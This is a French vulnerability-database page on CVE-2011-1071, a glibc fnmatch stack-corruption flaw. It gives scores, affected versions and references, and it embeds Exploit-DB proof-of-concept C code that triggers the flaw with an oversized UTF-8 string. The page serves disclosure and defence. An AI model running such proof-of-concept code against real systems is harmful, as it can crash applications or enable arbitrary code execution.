CVE-2011-1071 : Détail

CVE-2011-1071

3.08%V3
Network
2011-04-08
13h00 +00:00
2018-10-09
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The GNU C Library (aka glibc or libc6) before 2.12.2 and Embedded GLIBC (EGLIBC) allow context-dependent attackers to execute arbitrary code or cause a denial of service (memory consumption) via a long UTF8 string that is used in an fnmatch call, aka a "stack extension attack," a related issue to CVE-2010-2898, CVE-2010-1917, and CVE-2007-4782, as originally reported for use of this library by Google Chrome.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 17120

Date de publication : 2011-02-24 23h00 +00:00
Auteur : Simon Berry-Byrne
EDB Vérifié : No

/* source: https://www.securityfocus.com/bid/46563/info GNU glibc is prone to a stack-corruption vulnerability. An attacker can exploit this issue to execute arbitrary machine code in the context of the application that uses the affected library. Failed exploit attempts will likely crash the application. GNU glibc versions prior to 2.12.2 are vulnerable. */ #include <err.h> #include <fnmatch.h> #include <locale.h> #include <stdlib.h> #include <string.h> int main(int argc, const char* argv[]) { size_t num_as; char* p; setlocale(LC_ALL, "en_US.UTF8"); if (argc < 2) { errx(1, "Missing argument."); } num_as = atoi(argv[1]); if (num_as < 5) { errx(1, "Need 5."); } p = malloc(num_as); if (!p) { errx(1, "malloc() failed."); } memset(p, 'A', num_as); p[num_as - 1] = '\0'; p[0] = 'f'; p[1] = 'o'; p[2] = 'o'; p[3] = '.'; fnmatch("*.anim[1-9j]", p, 0); return 0; }

Products Mentioned

Configuraton 0

Gnu>>Eglibc >> Version *

    Gnu>>Glibc >> Version To (including) 2.12.1

    Gnu>>Glibc >> Version 1.00

    Gnu>>Glibc >> Version 1.01

    Gnu>>Glibc >> Version 1.02

    Gnu>>Glibc >> Version 1.03

    Gnu>>Glibc >> Version 1.04

    Gnu>>Glibc >> Version 1.05

    Gnu>>Glibc >> Version 1.06

    Gnu>>Glibc >> Version 1.07

    Gnu>>Glibc >> Version 1.08

    Gnu>>Glibc >> Version 1.09

    Gnu>>Glibc >> Version 1.09.1

    Gnu>>Glibc >> Version 2.0

    Gnu>>Glibc >> Version 2.0.1

    Gnu>>Glibc >> Version 2.0.2

    Gnu>>Glibc >> Version 2.0.3

    Gnu>>Glibc >> Version 2.0.4

    Gnu>>Glibc >> Version 2.0.5

    Gnu>>Glibc >> Version 2.0.6

    Gnu>>Glibc >> Version 2.1

    Gnu>>Glibc >> Version 2.1.1

    Gnu>>Glibc >> Version 2.1.1.6

    Gnu>>Glibc >> Version 2.1.2

    Gnu>>Glibc >> Version 2.1.3

    Gnu>>Glibc >> Version 2.1.3.10

    Gnu>>Glibc >> Version 2.1.9

    Gnu>>Glibc >> Version 2.2

    Gnu>>Glibc >> Version 2.2.1

    Gnu>>Glibc >> Version 2.2.2

    Gnu>>Glibc >> Version 2.2.3

    Gnu>>Glibc >> Version 2.2.4

    Gnu>>Glibc >> Version 2.2.5

    Gnu>>Glibc >> Version 2.3

    Gnu>>Glibc >> Version 2.3.1

    Gnu>>Glibc >> Version 2.3.2

    Gnu>>Glibc >> Version 2.3.3

    Gnu>>Glibc >> Version 2.3.4

    Gnu>>Glibc >> Version 2.3.5

    Gnu>>Glibc >> Version 2.3.6

    Gnu>>Glibc >> Version 2.3.10

    Gnu>>Glibc >> Version 2.4

    Gnu>>Glibc >> Version 2.5

    Gnu>>Glibc >> Version 2.5.1

    Gnu>>Glibc >> Version 2.6

    Gnu>>Glibc >> Version 2.6.1

    Gnu>>Glibc >> Version 2.7

    Gnu>>Glibc >> Version 2.8

    Gnu>>Glibc >> Version 2.9

    Gnu>>Glibc >> Version 2.10

    Gnu>>Glibc >> Version 2.10.1

    Gnu>>Glibc >> Version 2.10.2

    Gnu>>Glibc >> Version 2.11

    Gnu>>Glibc >> Version 2.11.1

    Gnu>>Glibc >> Version 2.11.2

    Gnu>>Glibc >> Version 2.11.3

    Gnu>>Glibc >> Version 2.12.0

    Références

    http://www.securityfocus.com/bid/46563
    Tags : vdb-entry, x_refsource_BID
    http://securityreason.com/securityalert/8175
    Tags : third-party-advisory, x_refsource_SREASON
    http://secunia.com/advisories/46397
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.redhat.com/support/errata/RHSA-2011-0412.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://www.vupen.com/english/advisories/2011/0863
    Tags : vdb-entry, x_refsource_VUPEN
    http://bugs.debian.org/615120
    Tags : x_refsource_CONFIRM
    http://secunia.com/advisories/43989
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://securitytracker.com/id?1025290
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/43492
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://openwall.com/lists/oss-security/2011/02/26/3
    Tags : mailing-list, x_refsource_MLIST
    http://openwall.com/lists/oss-security/2011/02/28/11
    Tags : mailing-list, x_refsource_MLIST
    http://seclists.org/fulldisclosure/2011/Feb/635
    Tags : mailing-list, x_refsource_FULLDISC
    http://seclists.org/fulldisclosure/2011/Feb/644
    Tags : mailing-list, x_refsource_FULLDISC
    http://www.mandriva.com/security/advisories?name=MDVSA-2011:178
    Tags : vendor-advisory, x_refsource_MANDRIVA
    http://secunia.com/advisories/43830
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.redhat.com/support/errata/RHSA-2011-0413.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://openwall.com/lists/oss-security/2011/02/28/15
    Tags : mailing-list, x_refsource_MLIST